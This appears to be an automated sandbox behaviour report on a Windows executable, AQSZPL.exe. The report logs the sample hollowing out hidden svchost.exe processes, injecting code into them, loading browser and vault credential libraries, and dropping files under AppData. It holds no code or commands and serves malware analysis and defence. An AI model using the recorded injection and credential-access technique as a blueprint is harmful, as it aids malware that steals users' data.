4f44cc16...74c2

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0xee4	Analysis Target	High (Elevated)	aqszpl.exe	"C:\Users\CIiHmnxMn6Ps\Desktop\AQSZPL.exe"	-
#2	0xf20	Child Process	High (Elevated)	svchost.exe	"C:\Windows\System32\svchost.exe"	#1
#3	0xf28	Child Process	High (Elevated)	svchost.exe	"C:\Windows\System32\svchost.exe"	#1

Behavior Information - Grouped by Category

Process #1: aqszpl.exe

Information	Value
ID	#1
File Name	c:\users\ciihmnxmn6ps\desktop\aqszpl.exe
Command Line	"C:\Users\CIiHmnxMn6Ps\Desktop\AQSZPL.exe"
Initial Working Directory	C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor	Start Time: 00:00:55, Reason: Analysis Target
Unmonitor	End Time: 00:01:05, Reason: Self Terminated
Monitor Duration	00:00:10

OS Process Information

Information	Value
PID	0xee4
Parent PID	0x820 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x EE8 0x EEC 0x EF0 0x EF4

Region

Name	Start VA	End VA	Type	Permissions	Actions
aqszpl.exe	0x00630000	0x006a7fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000006b0000	0x006b0000	0x006cffff	Private Memory	rw	-
pagefile_0x00000000006b0000	0x006b0000	0x006bffff	Pagefile Backed Memory	rw	-
private_0x00000000006c0000	0x006c0000	0x006c3fff	Private Memory	rw	-
private_0x00000000006d0000	0x006d0000	0x006d0fff	Private Memory	rw	-
pagefile_0x00000000006e0000	0x006e0000	0x006f3fff	Pagefile Backed Memory	r	-
private_0x0000000000700000	0x00700000	0x0073ffff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x0083ffff	Private Memory	rw	-
pagefile_0x0000000000840000	0x00840000	0x00843fff	Pagefile Backed Memory	r	-
private_0x0000000000850000	0x00850000	0x00851fff	Private Memory	rw	-
private_0x0000000000860000	0x00860000	0x00860fff	Private Memory	rw	-
pagefile_0x0000000000870000	0x00870000	0x00870fff	Pagefile Backed Memory	r	-
private_0x0000000000880000	0x00880000	0x0088ffff	Private Memory	rw	-
pagefile_0x0000000000890000	0x00890000	0x00890fff	Pagefile Backed Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x008affff	Private Memory	rw	-
locale.nls	0x008b0000	0x0096dfff	Memory Mapped File	r	-
private_0x0000000000970000	0x00970000	0x009affff	Private Memory	rw	-
pagefile_0x00000000009b0000	0x009b0000	0x009b0fff	Pagefile Backed Memory	rw	-
private_0x00000000009c0000	0x009c0000	0x009cffff	Private Memory	-	-
private_0x00000000009d0000	0x009d0000	0x009dffff	Private Memory	-	-
private_0x00000000009e0000	0x009e0000	0x009effff	Private Memory	-	-
private_0x00000000009f0000	0x009f0000	0x009fffff	Private Memory	-	-
private_0x0000000000a00000	0x00a00000	0x00a0ffff	Private Memory	rwx	-
private_0x0000000000a10000	0x00a10000	0x00a1ffff	Private Memory	-	-
private_0x0000000000a20000	0x00a20000	0x00a2ffff	Private Memory	-	-
private_0x0000000000a30000	0x00a30000	0x00a6ffff	Private Memory	rw	-
pagefile_0x0000000000a70000	0x00a70000	0x00a70fff	Pagefile Backed Memory	rw	-
l_intl.nls	0x00a80000	0x00a82fff	Memory Mapped File	r	-
private_0x0000000000a90000	0x00a90000	0x00b8ffff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c8ffff	Private Memory	rw	-
private_0x0000000000c90000	0x00c90000	0x00d8ffff	Private Memory	rw	-
private_0x0000000000d90000	0x00d90000	0x00dcffff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00ddffff	Private Memory	-	-
pagefile_0x0000000000de0000	0x00de0000	0x00de0fff	Pagefile Backed Memory	r	-
private_0x0000000000df0000	0x00df0000	0x00dfffff	Private Memory	rw	-
private_0x0000000000e00000	0x00e00000	0x00e0ffff	Private Memory	rw	-
pagefile_0x0000000000e10000	0x00e10000	0x00f97fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000fa0000	0x00fa0000	0x01120fff	Pagefile Backed Memory	r	-
pagefile_0x0000000001130000	0x01130000	0x0252ffff	Pagefile Backed Memory	r	-
private_0x0000000002530000	0x02530000	0x025cffff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026cffff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x026dffff	Private Memory	-	-
sorttbls.nlp	0x026e0000	0x026e4fff	Memory Mapped File	r	-
pagefile_0x00000000026f0000	0x026f0000	0x026f0fff	Pagefile Backed Memory	r	-
private_0x00000000026f0000	0x026f0000	0x026fffff	Private Memory	-	-
private_0x0000000002700000	0x02700000	0x0270ffff	Private Memory	rw	-
sortdefault.nls	0x02710000	0x02a46fff	Memory Mapped File	r	-
private_0x0000000002a50000	0x02a50000	0x04a4ffff	Private Memory	rw	-
sortkey.nlp	0x04a50000	0x04a90fff	Memory Mapped File	r	-
mscorrc.dll	0x04aa0000	0x04af3fff	Memory Mapped File	r	-
pagefile_0x0000000004b00000	0x04b00000	0x04b2efff	Pagefile Backed Memory	rw	-
pagefile_0x0000000004b30000	0x04b30000	0x04b40fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000004b50000	0x04b50000	0x04b60fff	Pagefile Backed Memory	rw	-
private_0x0000000004b70000	0x04b70000	0x04c6ffff	Private Memory	rw	-
kernelbase.dll.mui	0x04c70000	0x04d4efff	Memory Mapped File	r	-
system.windows.forms.ni.dll	0x71ca0000	0x7287ffff	Memory Mapped File	rwx	-
system.ni.dll	0x72880000	0x73022fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x73030000	0x73037fff	Memory Mapped File	rwx	-
wow64.dll	0x73040000	0x7308efff	Memory Mapped File	rwx	-
wow64win.dll	0x73090000	0x73102fff	Memory Mapped File	rwx	-
system.drawing.ni.dll	0x734c0000	0x73648fff	Memory Mapped File	rwx	-
culture.dll	0x73640000	0x73647fff	Memory Mapped File	rwx	-
mscorjit.dll	0x73650000	0x736aafff	Memory Mapped File	rwx	-
mscorlib.ni.dll	0x736b0000	0x741a9fff	Memory Mapped File	rwx	-
msvcr80.dll	0x741b0000	0x7424afff	Memory Mapped File	rwx	-
mscorwks.dll	0x74250000	0x747fffff	Memory Mapped File	rwx	-
version.dll	0x74800000	0x74807fff	Memory Mapped File	rwx	-
mscoreei.dll	0x74810000	0x74887fff	Memory Mapped File	rwx	-
mscoree.dll	0x74890000	0x748e8fff	Memory Mapped File	rwx	-
apphelp.dll	0x74990000	0x74a20fff	Memory Mapped File	rwx	-
bcryptprimitives.dll	0x74a30000	0x74a88fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74a90000	0x74a99fff	Memory Mapped File	rwx	-
sspicli.dll	0x74aa0000	0x74abdfff	Memory Mapped File	rwx	-
user32.dll	0x74ad0000	0x74c0ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x74c10000	0x74c53fff	Memory Mapped File	rwx	-
advapi32.dll	0x74c60000	0x74cdafff	Memory Mapped File	rwx	-
powrprof.dll	0x74ce0000	0x74d23fff	Memory Mapped File	rwx	-
kernelbase.dll	0x74d30000	0x74ea5fff	Memory Mapped File	rwx	-
combase.dll	0x74f70000	0x75129fff	Memory Mapped File	rwx	-
kernel32.dll	0x75130000	0x7521ffff	Memory Mapped File	rwx	-
imm32.dll	0x75220000	0x7524afff	Memory Mapped File	rwx	-
kernel.appcore.dll	0x752b0000	0x752bbfff	Memory Mapped File	rwx	-
shell32.dll	0x752c0000	0x7667efff	Memory Mapped File	rwx	-
windows.storage.dll	0x76800000	0x76cdcfff	Memory Mapped File	rwx	-
msctf.dll	0x76da0000	0x76ebffff	Memory Mapped File	rwx	-
ole32.dll	0x76f30000	0x77019fff	Memory Mapped File	rwx	-
sechost.dll	0x770b0000	0x770f2fff	Memory Mapped File	rwx	-
profapi.dll	0x77100000	0x7710efff	Memory Mapped File	rwx	-
shcore.dll	0x771d0000	0x7725cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772c0000	0x7736bfff	Memory Mapped File	rwx	-
gdi32.dll	0x77370000	0x774bcfff	Memory Mapped File	rwx	-
msvcrt.dll	0x778d0000	0x7798dfff	Memory Mapped File	rwx	-
ntdll.dll	0x77990000	0x77b08fff	Memory Mapped File	rwx	-
private_0x000000007fa0d000	0x7fa0d000	0x7fa0ffff	Private Memory	rw	-
pagefile_0x000000007fa10000	0x7fa10000	0x7fb0ffff	Pagefile Backed Memory	r	-
pagefile_0x000000007fb10000	0x7fb10000	0x7fb32fff	Pagefile Backed Memory	r	-
private_0x000000007fb35000	0x7fb35000	0x7fb35fff	Private Memory	rw	-
private_0x000000007fb36000	0x7fb36000	0x7fb38fff	Private Memory	rw	-
private_0x000000007fb39000	0x7fb39000	0x7fb3bfff	Private Memory	rw	-
private_0x000000007fb3c000	0x7fb3c000	0x7fb3efff	Private Memory	rw	-
private_0x000000007fb3f000	0x7fb3f000	0x7fb3ffff	Private Memory	rw	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7ffaf7a0ffff	Private Memory	r	-
ntdll.dll	0x7ffaf7a10000	0x7ffaf7bd1fff	Memory Mapped File	rwx	-
private_0x00007ffaf7bd2000	0x7ffaf7bd2000	0x7ffffffeffff	Private Memory	r	-

Host Behavior

File (1)

Operation	Filename	Additional Information	Success	Count	Logfile
Get Info	C:\Users\CIiHmnxMn6Ps\Desktop\AQSZPL.exe.config	type = file_attributes		1	Fn

Process (3)

Operation	Process	Additional Information	Count	Logfile
Create	C:\Windows\System32\svchost.exe	os_pid = 0xf20, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\svchost.exe	os_pid = 0xf28, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Terminate	C:\Windows\System32\svchost.exe	exit_code = 0	1	Fn

Thread (3)

Operation	Process	Additional Information	Count	Logfile
Get Context	c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	os_tid = 0xee8	1	Fn
Set Context	c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	os_tid = 0xee8	1	Fn
Resume	c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	os_tid = 0xee8	1	Fn

Memory (12)

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\System32\svchost.exe	address = 0x0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 663552	1	Fn
Allocate	C:\Windows\System32\svchost.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 663552	1	Fn
Protect	C:\Windows\System32\svchost.exe	address = 0x401000, protection = PAGE_EXECUTE_READWRITE, size = 79605	1	Fn
Protect	C:\Windows\System32\svchost.exe	address = 0x415000, protection = PAGE_EXECUTE_READWRITE, size = 16480	1	Fn
Protect	C:\Windows\System32\svchost.exe	address = 0x41a000, protection = PAGE_EXECUTE_READWRITE, size = 548388	1	Fn
Protect	C:\Windows\System32\svchost.exe	address = 0x4a0000, protection = PAGE_EXECUTE_READWRITE, size = 8192	1	Fn
Write	C:\Windows\System32\svchost.exe	address = 0x400000, size = 1024	1	Fn Data
Write	C:\Windows\System32\svchost.exe	address = 0x401000, size = 79872	1	Fn Data
Write	C:\Windows\System32\svchost.exe	address = 0x415000, size = 16896	1	Fn Data
Write	C:\Windows\System32\svchost.exe	address = 0x41a000, size = 512	1	Fn Data
Write	C:\Windows\System32\svchost.exe	address = 0x4a0000, size = 8192	1	Fn Data
Write	C:\Windows\System32\svchost.exe	address = 0x7edae008, size = 4	1	Fn Data

User (1)

Operation	Additional Information	Success	Count	Logfile
Lookup Privilege	privilege = SeDebugPrivilege, luid = 20		1	Fn

System (6)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = Operating System		3	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION		3	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = WinDir, result_out = C:\Windows		1	Fn

Process #2: svchost.exe

Information	Value
ID	#2
File Name	c:\windows\syswow64\svchost.exe
Command Line	"C:\Windows\System32\svchost.exe"
Initial Working Directory	C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor	Start Time: 00:01:03, Reason: Child Process
Unmonitor	End Time: 00:01:05, Reason: Self Terminated
Monitor Duration	00:00:02
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xf20
Parent PID	0xee4 (c:\users\ciihmnxmn6ps\desktop\aqszpl.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F24

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000410000	0x00410000	0x0042ffff	Private Memory	rw	-
private_0x0000000000430000	0x00430000	0x00430fff	Private Memory	rw	-
pagefile_0x0000000000440000	0x00440000	0x00453fff	Pagefile Backed Memory	r	-
private_0x0000000000460000	0x00460000	0x0049ffff	Private Memory	rw	-
private_0x00000000004a0000	0x004a0000	0x004dffff	Private Memory	rw	-
pagefile_0x00000000004e0000	0x004e0000	0x004e3fff	Pagefile Backed Memory	r	-
pagefile_0x00000000004f0000	0x004f0000	0x004f0fff	Pagefile Backed Memory	r	-
private_0x0000000000500000	0x00500000	0x00501fff	Private Memory	rw	-
svchost.exe	0x00880000	0x0088afff	Memory Mapped File	rwx	-
pagefile_0x0000000000890000	0x00890000	0x0488ffff	Pagefile Backed Memory	-	-
ntdll.dll	0x77990000	0x77b08fff	Memory Mapped File	rwx	-
pagefile_0x000000007e850000	0x7e850000	0x7e872fff	Pagefile Backed Memory	r	-
private_0x000000007e87b000	0x7e87b000	0x7e87dfff	Private Memory	rw	-
private_0x000000007e87e000	0x7e87e000	0x7e87efff	Private Memory	rw	-
private_0x000000007e87f000	0x7e87f000	0x7e87ffff	Private Memory	rw	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7dfaf7a0ffff	Private Memory	r	-
pagefile_0x00007dfaf7a10000	0x7dfaf7a10000	0x7ffaf7a0ffff	Pagefile Backed Memory	-	-
ntdll.dll	0x7ffaf7a10000	0x7ffaf7bd1fff	Memory Mapped File	rwx	-
private_0x00007ffaf7bd2000	0x7ffaf7bd2000	0x7ffffffeffff	Private Memory	r	-

Process #3: svchost.exe

1522

271

Information	Value
ID	#3
File Name	c:\windows\syswow64\svchost.exe
Command Line	"C:\Windows\System32\svchost.exe"
Initial Working Directory	C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor	Start Time: 00:01:03, Reason: Child Process
Unmonitor	End Time: 00:04:57, Reason: Terminated by Timeout
Monitor Duration	00:03:54

OS Process Information

Information	Value
PID	0xf28
Parent PID	0xee4 (c:\users\ciihmnxmn6ps\desktop\aqszpl.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F2C 0x F30 0x F34 0x F38 0x F98 0x D0C 0x C6C 0x C70 0x D64 0x CFC 0x 7E4 0x 2D4 0x 510 0x E38 0x E10 0x E20 0x E28 0x E24 0x DF8 0x E00 0x 528 0x 858 0x EAC 0x EC4 0x 1A0 0x C30 0x F4C 0x A7C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000400000	0x00400000	0x004a1fff	Private Memory	rwx	-
private_0x0000000000620000	0x00620000	0x0063ffff	Private Memory	rw	-
pagefile_0x0000000000620000	0x00620000	0x0062ffff	Pagefile Backed Memory	rw	-
private_0x0000000000630000	0x00630000	0x00630fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x00640fff	Private Memory	rw	-
pagefile_0x0000000000650000	0x00650000	0x00663fff	Pagefile Backed Memory	r	-
private_0x0000000000670000	0x00670000	0x006affff	Private Memory	rw	-
private_0x00000000006b0000	0x006b0000	0x006effff	Private Memory	rw	-
pagefile_0x00000000006f0000	0x006f0000	0x006f3fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000700000	0x00700000	0x00700fff	Pagefile Backed Memory	r	-
private_0x0000000000710000	0x00710000	0x00711fff	Private Memory	rw	-
locale.nls	0x00720000	0x007ddfff	Memory Mapped File	r	-
pagefile_0x00000000007e0000	0x007e0000	0x007e0fff	Pagefile Backed Memory	rw	-
private_0x00000000007f0000	0x007f0000	0x007f3fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00800fff	Private Memory	rw	-
tzres.dll	0x00800000	0x00802fff	Memory Mapped File	r	-
private_0x0000000000800000	0x00800000	0x00804fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00802fff	Private Memory	rw	-
tzres.dll.mui	0x00810000	0x00818fff	Memory Mapped File	r	-
private_0x0000000000810000	0x00810000	0x00811fff	Private Memory	rw	-
private_0x0000000000830000	0x00830000	0x00836fff	Private Memory	rw	-
private_0x0000000000840000	0x00840000	0x0087ffff	Private Memory	rw	-
svchost.exe	0x00880000	0x0088afff	Memory Mapped File	rwx	-
pagefile_0x0000000000890000	0x00890000	0x0488ffff	Pagefile Backed Memory	-	-
private_0x0000000004890000	0x04890000	0x048cffff	Private Memory	rw	-
private_0x0000000004900000	0x04900000	0x049fffff	Private Memory	rw	-
private_0x0000000004a00000	0x04a00000	0x04afffff	Private Memory	rw	-
private_0x0000000004b00000	0x04b00000	0x04bfffff	Private Memory	rw	-
pagefile_0x0000000004c00000	0x04c00000	0x04d87fff	Pagefile Backed Memory	r	-
private_0x0000000004da0000	0x04da0000	0x04da3fff	Private Memory	rw	-
private_0x0000000004db0000	0x04db0000	0x04deffff	Private Memory	rw	-
private_0x0000000004e00000	0x04e00000	0x04efffff	Private Memory	rw	-
pagefile_0x0000000004f00000	0x04f00000	0x05080fff	Pagefile Backed Memory	r	-
pagefile_0x0000000005090000	0x05090000	0x0648ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x06490000	0x067c6fff	Memory Mapped File	r	-
private_0x00000000067d0000	0x067d0000	0x068cffff	Private Memory	rw	-
ucrtbase.dll	0x068d0000	0x069abfff	Memory Mapped File	rwx	-
private_0x00000000068d0000	0x068d0000	0x069cffff	Private Memory	rw	-
private_0x00000000068d0000	0x068d0000	0x069d0fff	Private Memory	rw	-
private_0x00000000068d0000	0x068d0000	0x0690ffff	Private Memory	rw	-
private_0x0000000006930000	0x06930000	0x06933fff	Private Memory	rw	-
private_0x0000000006940000	0x06940000	0x06a3ffff	Private Memory	rw	-
ucrtbase.dll	0x069b0000	0x06a8bfff	Memory Mapped File	rwx	-
private_0x0000000006a40000	0x06a40000	0x06a7ffff	Private Memory	rw	-
private_0x0000000006a90000	0x06a90000	0x06b8ffff	Private Memory	rw	-
private_0x0000000006b90000	0x06b90000	0x06d8efff	Private Memory	rw	-
private_0x0000000006b90000	0x06b90000	0x06bcffff	Private Memory	rw	-
private_0x0000000006c00000	0x06c00000	0x06cfffff	Private Memory	rw	-
private_0x0000000006d00000	0x06d00000	0x06efefff	Private Memory	rw	-
private_0x0000000006d00000	0x06d00000	0x06dfffff	Private Memory	rw	-
private_0x0000000006e00000	0x06e00000	0x06efffff	Private Memory	rw	-
private_0x0000000006f00000	0x06f00000	0x06ffffff	Private Memory	rw	-
private_0x0000000007000000	0x07000000	0x070fffff	Private Memory	rw	-
wow64cpu.dll	0x73030000	0x73037fff	Memory Mapped File	rwx	-
wow64.dll	0x73040000	0x7308efff	Memory Mapped File	rwx	-
wow64win.dll	0x73090000	0x73102fff	Memory Mapped File	rwx	-
rsaenh.dll	0x73450000	0x7347efff	Memory Mapped File	rwx	-
bcrypt.dll	0x73480000	0x7349afff	Memory Mapped File	rwx	-
cryptsp.dll	0x734a0000	0x734b2fff	Memory Mapped File	rwx	-
nss3.dll	0x73580000	0x736aefff	Memory Mapped File	rwx	-
freebl3.dll	0x744b0000	0x74504fff	Memory Mapped File	rwx	-
nssdbm3.dll	0x74510000	0x74528fff	Memory Mapped File	rwx	-
softokn3.dll	0x74530000	0x74555fff	Memory Mapped File	rwx	-
msvcp140.dll	0x74560000	0x745ccfff	Memory Mapped File	rwx	-
ntmarta.dll	0x74560000	0x74587fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x74590000	0x74597fff	Memory Mapped File	rwx	-
fwpuclnt.dll	0x745a0000	0x745e5fff	Memory Mapped File	rwx	-
devobj.dll	0x745d0000	0x745f0fff	Memory Mapped File	rwx	-
winnsi.dll	0x745f0000	0x745f7fff	Memory Mapped File	rwx	-
dbghelp.dll	0x74600000	0x7473efff	Memory Mapped File	rwx	-
iphlpapi.dll	0x74600000	0x7462ffff	Memory Mapped File	rwx	-
dnsapi.dll	0x74630000	0x746b3fff	Memory Mapped File	rwx	-
mswsock.dll	0x746c0000	0x7470dfff	Memory Mapped File	rwx	-
dpapi.dll	0x74710000	0x74717fff	Memory Mapped File	rwx	-
userenv.dll	0x74720000	0x74738fff	Memory Mapped File	rwx	-
version.dll	0x74740000	0x74747fff	Memory Mapped File	rwx	-
samlib.dll	0x74740000	0x74752fff	Memory Mapped File	rwx	-
winmmbase.dll	0x74750000	0x74772fff	Memory Mapped File	rwx	-
samcli.dll	0x74760000	0x74773fff	Memory Mapped File	rwx	-
ucrtbase.dll	0x74780000	0x7485bfff	Memory Mapped File	rwx	-
srvcli.dll	0x74780000	0x7479bfff	Memory Mapped File	rwx	-
netutils.dll	0x747a0000	0x747a9fff	Memory Mapped File	rwx	-
wkscli.dll	0x747b0000	0x747bffff	Memory Mapped File	rwx	-
netapi32.dll	0x747c0000	0x747d2fff	Memory Mapped File	rwx	-
wintypes.dll	0x747e0000	0x748a4fff	Memory Mapped File	rwx	-
vcruntime140.dll	0x74860000	0x74873fff	Memory Mapped File	rwx	-
wsock32.dll	0x74880000	0x74887fff	Memory Mapped File	rwx	-
mozglue.dll	0x74890000	0x748b1fff	Memory Mapped File	rwx	-
vaultcli.dll	0x748b0000	0x748e5fff	Memory Mapped File	rwx	-
winmm.dll	0x748c0000	0x748e3fff	Memory Mapped File	rwx	-
bcryptprimitives.dll	0x74a30000	0x74a88fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74a90000	0x74a99fff	Memory Mapped File	rwx	-
sspicli.dll	0x74aa0000	0x74abdfff	Memory Mapped File	rwx	-
nsi.dll	0x74ac0000	0x74ac6fff	Memory Mapped File	rwx	-
user32.dll	0x74ad0000	0x74c0ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x74c10000	0x74c53fff	Memory Mapped File	rwx	-
advapi32.dll	0x74c60000	0x74cdafff	Memory Mapped File	rwx	-
powrprof.dll	0x74ce0000	0x74d23fff	Memory Mapped File	rwx	-
kernelbase.dll	0x74d30000	0x74ea5fff	Memory Mapped File	rwx	-
combase.dll	0x74f70000	0x75129fff	Memory Mapped File	rwx	-
kernel32.dll	0x75130000	0x7521ffff	Memory Mapped File	rwx	-
imm32.dll	0x75220000	0x7524afff	Memory Mapped File	rwx	-
kernel.appcore.dll	0x752b0000	0x752bbfff	Memory Mapped File	rwx	-
shell32.dll	0x752c0000	0x7667efff	Memory Mapped File	rwx	-
crypt32.dll	0x76680000	0x767f4fff	Memory Mapped File	rwx	-
windows.storage.dll	0x76800000	0x76cdcfff	Memory Mapped File	rwx	-
oleaut32.dll	0x76ce0000	0x76d71fff	Memory Mapped File	rwx	-
msctf.dll	0x76da0000	0x76ebffff	Memory Mapped File	rwx	-
ws2_32.dll	0x76ed0000	0x76f2bfff	Memory Mapped File	rwx	-
ole32.dll	0x76f30000	0x77019fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x77020000	0x77055fff	Memory Mapped File	rwx	-
sechost.dll	0x770b0000	0x770f2fff	Memory Mapped File	rwx	-
profapi.dll	0x77100000	0x7710efff	Memory Mapped File	rwx	-
msasn1.dll	0x771c0000	0x771cdfff	Memory Mapped File	rwx	-
shcore.dll	0x771d0000	0x7725cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772c0000	0x7736bfff	Memory Mapped File	rwx	-
gdi32.dll	0x77370000	0x774bcfff	Memory Mapped File	rwx	-
msvcrt.dll	0x778d0000	0x7798dfff	Memory Mapped File	rwx	-
ntdll.dll	0x77990000	0x77b08fff	Memory Mapped File	rwx	-
private_0x000000007ec74000	0x7ec74000	0x7ec76fff	Private Memory	rw	-
private_0x000000007ec77000	0x7ec77000	0x7ec79fff	Private Memory	rw	-
private_0x000000007ec7a000	0x7ec7a000	0x7ec7cfff	Private Memory	rw	-
private_0x000000007ec7d000	0x7ec7d000	0x7ec7ffff	Private Memory	rw	-
pagefile_0x000000007ec80000	0x7ec80000	0x7ed7ffff	Pagefile Backed Memory	r	-
pagefile_0x000000007ed80000	0x7ed80000	0x7eda2fff	Pagefile Backed Memory	r	-
private_0x000000007eda3000	0x7eda3000	0x7eda3fff	Private Memory	rw	-
private_0x000000007eda5000	0x7eda5000	0x7eda7fff	Private Memory	rw	-
private_0x000000007eda8000	0x7eda8000	0x7edaafff	Private Memory	rw	-
private_0x000000007edab000	0x7edab000	0x7edadfff	Private Memory	rw	-
private_0x000000007edae000	0x7edae000	0x7edaefff	Private Memory	rw	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7dfaf7a0ffff	Private Memory	r	-
pagefile_0x00007dfaf7a10000	0x7dfaf7a10000	0x7ffaf7a0ffff	Pagefile Backed Memory	-	-
ntdll.dll	0x7ffaf7a10000	0x7ffaf7bd1fff	Memory Mapped File	rwx	-
private_0x00007ffaf7bd2000	0x7ffaf7bd2000	0x7ffffffeffff	Private Memory	r	-

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	address = 0x400000, size = 1024	1	Fn Data
Modify Memory	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	address = 0x401000, size = 79872	1	Fn Data
Modify Memory	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	address = 0x415000, size = 16896	1	Fn Data
Modify Memory	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	address = 0x41a000, size = 512	1	Fn Data
Modify Memory	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	address = 0x4a0000, size = 8192	1	Fn Data
Modify Memory	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	address = 0x7edae008, size = 4	1	Fn Data
Modify Control Flow	#1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe	0xee8	os_tid = 0xf2c, address = 0x779faef0	1	Fn

Created Files

Filename	File Size	Hash Values	Actions
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe	34.35 KB	MD5: a412dedac6a1ff7ba06feb3b6725495e SHA1: bcae71ba4068be87f9d5739afec8f7081d00a97e SHA256: b4853f76dfe066a5b2aeb3166bac4d6ff1548e9119205f65ac6cab6d165f9850 SSDeep: 768:a9ng5dqluvtOnVZPn/mW1GT3Qk1P7kGB:Kg5dvcTP/BGT3Q0P7k	... File Actions Show Properties Download
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck	0.00 KB	MD5: c4ca4238a0b923820dcc509a6f75849b SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b SSDeep: 3:U:U	... File Actions Show Properties Download
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b	0.05 KB	MD5: eca0470178275ac94e5de381969ed232 SHA1: d6de27e734eec57d1dda73489b4a6d6eecae3038 SHA256: 353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f812e7594cf2ec5ca1175785b50 SSDeep: 3::	... File Actions Show Properties Download
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb	0.00 KB	MD5: aee1587391978acd0d0987dde93d05c6 SHA1: 418954d08d2fff0318c94e488c67a7de32f78b58 SHA256: f10b441a59ec65e42a7075ab6246a5ad8f06541c3e6eae64d4211151d9819dfe SSDeep: 3:O:O	... File Actions Show Properties Download
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b	0.05 KB	MD5: 0e74b2d60180ca3a437d55528e1845ff SHA1: f002adc25ab2fc62b181790d0f5369045b4966e5 SHA256: 75183ca2bd0d0ee61fa5ac42333bb6235eefa8f5210a42fc758ea03223105cfe SSDeep: 3:/l4lQgdocl:exdocl	... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
